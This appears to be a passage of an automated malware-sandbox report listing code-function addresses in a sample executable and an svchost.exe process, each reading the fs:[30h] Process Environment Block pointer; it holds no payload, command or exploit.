            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0454DE88 mov eax, dword ptr fs:[00000030h]0_2_0454DE88
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D437C mov eax, dword ptr fs:[00000030h]8_2_037D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B035C mov eax, dword ptr fs:[00000030h]8_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B035C mov eax, dword ptr fs:[00000030h]8_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B035C mov eax, dword ptr fs:[00000030h]8_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B035C mov ecx, dword ptr fs:[00000030h]8_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B035C mov eax, dword ptr fs:[00000030h]8_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B035C mov eax, dword ptr fs:[00000030h]8_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037FA352 mov eax, dword ptr fs:[00000030h]8_2_037FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D8350 mov ecx, dword ptr fs:[00000030h]8_2_037D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h]8_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h]8_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h]8_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h]8_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h]8_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h]8_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h]8_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h]8_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h]8_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h]8_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h]8_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h]8_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h]8_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h]8_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h]8_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372C310 mov ecx, dword ptr fs:[00000030h]8_2_0372C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03750310 mov ecx, dword ptr fs:[00000030h]8_2_03750310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376A30B mov eax, dword ptr fs:[00000030h]8_2_0376A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376A30B mov eax, dword ptr fs:[00000030h]8_2_0376A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376A30B mov eax, dword ptr fs:[00000030h]8_2_0376A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374E3F0 mov eax, dword ptr fs:[00000030h]8_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374E3F0 mov eax, dword ptr fs:[00000030h]8_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374E3F0 mov eax, dword ptr fs:[00000030h]8_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037663FF mov eax, dword ptr fs:[00000030h]8_2_037663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037403E9 mov eax, dword ptr fs:[00000030h]8_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037403E9 mov eax, dword ptr fs:[00000030h]8_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037403E9 mov eax, dword ptr fs:[00000030h]8_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037403E9 mov eax, dword ptr fs:[00000030h]8_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037403E9 mov eax, dword ptr fs:[00000030h]8_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037403E9 mov eax, dword ptr fs:[00000030h]8_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037403E9 mov eax, dword ptr fs:[00000030h]8_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037403E9 mov eax, dword ptr fs:[00000030h]8_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE3DB mov eax, dword ptr fs:[00000030h]8_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE3DB mov eax, dword ptr fs:[00000030h]8_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE3DB mov ecx, dword ptr fs:[00000030h]8_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE3DB mov eax, dword ptr fs:[00000030h]8_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D43D4 mov eax, dword ptr fs:[00000030h]8_2_037D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D43D4 mov eax, dword ptr fs:[00000030h]8_2_037D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037EC3CD mov eax, dword ptr fs:[00000030h]8_2_037EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A3C0 mov eax, dword ptr fs:[00000030h]8_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A3C0 mov eax, dword ptr fs:[00000030h]8_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A3C0 mov eax, dword ptr fs:[00000030h]8_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A3C0 mov eax, dword ptr fs:[00000030h]8_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A3C0 mov eax, dword ptr fs:[00000030h]8_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A3C0 mov eax, dword ptr fs:[00000030h]8_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037383C0 mov eax, dword ptr fs:[00000030h]8_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037383C0 mov eax, dword ptr fs:[00000030h]8_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037383C0 mov eax, dword ptr fs:[00000030h]8_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037383C0 mov eax, dword ptr fs:[00000030h]8_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B63C0 mov eax, dword ptr fs:[00000030h]8_2_037B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03728397 mov eax, dword ptr fs:[00000030h]8_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03728397 mov eax, dword ptr fs:[00000030h]8_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03728397 mov eax, dword ptr fs:[00000030h]8_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372E388 mov eax, dword ptr fs:[00000030h]8_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372E388 mov eax, dword ptr fs:[00000030h]8_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372E388 mov eax, dword ptr fs:[00000030h]8_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375438F mov eax, dword ptr fs:[00000030h]8_2_0375438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375438F mov eax, dword ptr fs:[00000030h]8_2_0375438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03734260 mov eax, dword ptr fs:[00000030h]8_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03734260 mov eax, dword ptr fs:[00000030h]8_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03734260 mov eax, dword ptr fs:[00000030h]8_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372826B mov eax, dword ptr fs:[00000030h]8_2_0372826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372A250 mov eax, dword ptr fs:[00000030h]8_2_0372A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03736259 mov eax, dword ptr fs:[00000030h]8_2_03736259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B8243 mov eax, dword ptr fs:[00000030h]8_2_037B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B8243 mov ecx, dword ptr fs:[00000030h]8_2_037B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372823B mov eax, dword ptr fs:[00000030h]8_2_0372823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037402E1 mov eax, dword ptr fs:[00000030h]8_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037402E1 mov eax, dword ptr fs:[00000030h]8_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037402E1 mov eax, dword ptr fs:[00000030h]8_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A2C3 mov eax, dword ptr fs:[00000030h]8_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A2C3 mov eax, dword ptr fs:[00000030h]8_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A2C3 mov eax, dword ptr fs:[00000030h]8_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A2C3 mov eax, dword ptr fs:[00000030h]8_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A2C3 mov eax, dword ptr fs:[00000030h]8_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037402A0 mov eax, dword ptr fs:[00000030h]8_2_037402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037402A0 mov eax, dword ptr fs:[00000030h]8_2_037402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C62A0 mov eax, dword ptr fs:[00000030h]8_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C62A0 mov ecx, dword ptr fs:[00000030h]8_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C62A0 mov eax, dword ptr fs:[00000030h]8_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C62A0 mov eax, dword ptr fs:[00000030h]8_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C62A0 mov eax, dword ptr fs:[00000030h]8_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C62A0 mov eax, dword ptr fs:[00000030h]8_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376E284 mov eax, dword ptr fs:[00000030h]8_2_0376E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376E284 mov eax, dword ptr fs:[00000030h]8_2_0376E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B0283 mov eax, dword ptr fs:[00000030h]8_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B0283 mov eax, dword ptr fs:[00000030h]8_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B0283 mov eax, dword ptr fs:[00000030h]8_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372C156 mov eax, dword ptr fs:[00000030h]8_2_0372C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C8158 mov eax, dword ptr fs:[00000030h]8_2_037C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03736154 mov eax, dword ptr fs:[00000030h]8_2_03736154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03736154 mov eax, dword ptr fs:[00000030h]8_2_03736154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C4144 mov eax, dword ptr fs:[00000030h]8_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C4144 mov eax, dword ptr fs:[00000030h]8_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C4144 mov ecx, dword ptr fs:[00000030h]8_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C4144 mov eax, dword ptr fs:[00000030h]8_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C4144 mov eax, dword ptr fs:[00000030h]8_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03760124 mov eax, dword ptr fs:[00000030h]8_2_03760124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DA118 mov ecx, dword ptr fs:[00000030h]8_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DA118 mov eax, dword ptr fs:[00000030h]8_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DA118 mov eax, dword ptr fs:[00000030h]8_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DA118 mov eax, dword ptr fs:[00000030h]8_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038061E5 mov eax, dword ptr fs:[00000030h]8_2_038061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F0115 mov eax, dword ptr fs:[00000030h]8_2_037F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov eax, dword ptr fs:[00000030h]8_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov ecx, dword ptr fs:[00000030h]8_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov eax, dword ptr fs:[00000030h]8_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov eax, dword ptr fs:[00000030h]8_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov ecx, dword ptr fs:[00000030h]8_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov eax, dword ptr fs:[00000030h]8_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov eax, dword ptr fs:[00000030h]8_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov ecx, dword ptr fs:[00000030h]8_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov eax, dword ptr fs:[00000030h]8_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov ecx, dword ptr fs:[00000030h]8_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037601F8 mov eax, dword ptr fs:[00000030h]8_2_037601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE1D0 mov eax, dword ptr fs:[00000030h]8_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE1D0 mov eax, dword ptr fs:[00000030h]8_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]8_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE1D0 mov eax, dword ptr fs:[00000030h]8_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE1D0 mov eax, dword ptr fs:[00000030h]8_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F61C3 mov eax, dword ptr fs:[00000030h]8_2_037F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F61C3 mov eax, dword ptr fs:[00000030h]8_2_037F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B019F mov eax, dword ptr fs:[00000030h]8_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B019F mov eax, dword ptr fs:[00000030h]8_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B019F mov eax, dword ptr fs:[00000030h]8_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B019F mov eax, dword ptr fs:[00000030h]8_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372A197 mov eax, dword ptr fs:[00000030h]8_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372A197 mov eax, dword ptr fs:[00000030h]8_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372A197 mov eax, dword ptr fs:[00000030h]8_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03770185 mov eax, dword ptr fs:[00000030h]8_2_03770185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037EC188 mov eax, dword ptr fs:[00000030h]8_2_037EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037EC188 mov eax, dword ptr fs:[00000030h]8_2_037EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D4180 mov eax, dword ptr fs:[00000030h]8_2_037D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D4180 mov eax, dword ptr fs:[00000030h]8_2_037D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375C073 mov eax, dword ptr fs:[00000030h]8_2_0375C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03732050 mov eax, dword ptr fs:[00000030h]8_2_03732050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B6050 mov eax, dword ptr fs:[00000030h]8_2_037B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C6030 mov eax, dword ptr fs:[00000030h]8_2_037C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372A020 mov eax, dword ptr fs:[00000030h]8_2_0372A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372C020 mov eax, dword ptr fs:[00000030h]8_2_0372C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374E016 mov eax, dword ptr fs:[00000030h]8_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374E016 mov eax, dword ptr fs:[00000030h]8_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374E016 mov eax, dword ptr fs:[00000030h]8_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374E016 mov eax, dword ptr fs:[00000030h]8_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B4000 mov ecx, dword ptr fs:[00000030h]8_2_037B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D2000 mov eax, dword ptr fs:[00000030h]8_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D2000 mov eax, dword ptr fs:[00000030h]8_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D2000 mov eax, dword ptr fs:[00000030h]8_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D2000 mov eax, dword ptr fs:[00000030h]8_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D2000 mov eax, dword ptr fs:[00000030h]8_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D2000 mov eax, dword ptr fs:[00000030h]8_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D2000 mov eax, dword ptr fs:[00000030h]8_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D2000 mov eax, dword ptr fs:[00000030h]8_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372C0F0 mov eax, dword ptr fs:[00000030h]8_2_0372C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037720F0 mov ecx, dword ptr fs:[00000030h]8_2_037720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]8_2_0372A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037380E9 mov eax, dword ptr fs:[00000030h]8_2_037380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B60E0 mov eax, dword ptr fs:[00000030h]8_2_037B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B20DE mov eax, dword ptr fs:[00000030h]8_2_037B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F60B8 mov eax, dword ptr fs:[00000030h]8_2_037F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F60B8 mov ecx, dword ptr fs:[00000030h]8_2_037F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C80A8 mov eax, dword ptr fs:[00000030h]8_2_037C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373208A mov eax, dword ptr fs:[00000030h]8_2_0373208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03738770 mov eax, dword ptr fs:[00000030h]8_2_03738770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03730750 mov eax, dword ptr fs:[00000030h]8_2_03730750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037BE75D mov eax, dword ptr fs:[00000030h]8_2_037BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772750 mov eax, dword ptr fs:[00000030h]8_2_03772750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772750 mov eax, dword ptr fs:[00000030h]8_2_03772750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B4755 mov eax, dword ptr fs:[00000030h]8_2_037B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376674D mov esi, dword ptr fs:[00000030h]8_2_0376674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376674D mov eax, dword ptr fs:[00000030h]8_2_0376674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376674D mov eax, dword ptr fs:[00000030h]8_2_0376674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376273C mov eax, dword ptr fs:[00000030h]8_2_0376273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376273C mov ecx, dword ptr fs:[00000030h]8_2_0376273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376273C mov eax, dword ptr fs:[00000030h]8_2_0376273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AC730 mov eax, dword ptr fs:[00000030h]8_2_037AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376C720 mov eax, dword ptr fs:[00000030h]8_2_0376C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376C720 mov eax, dword ptr fs:[00000030h]8_2_0376C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03730710 mov eax, dword ptr fs:[00000030h]8_2_03730710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03760710 mov eax, dword ptr fs:[00000030h]8_2_03760710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376C700 mov eax, dword ptr fs:[00000030h]8_2_0376C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037347FB mov eax, dword ptr fs:[00000030h]8_2_037347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037347FB mov eax, dword ptr fs:[00000030h]8_2_037347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037527ED mov eax, dword ptr fs:[00000030h]8_2_037527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037527ED mov eax, dword ptr fs:[00000030h]8_2_037527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037527ED mov eax, dword ptr fs:[00000030h]8_2_037527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037BE7E1 mov eax, dword ptr fs:[00000030h]8_2_037BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373C7C0 mov eax, dword ptr fs:[00000030h]8_2_0373C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B07C3 mov eax, dword ptr fs:[00000030h]8_2_037B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037307AF mov eax, dword ptr fs:[00000030h]8_2_037307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E47A0 mov eax, dword ptr fs:[00000030h]8_2_037E47A0
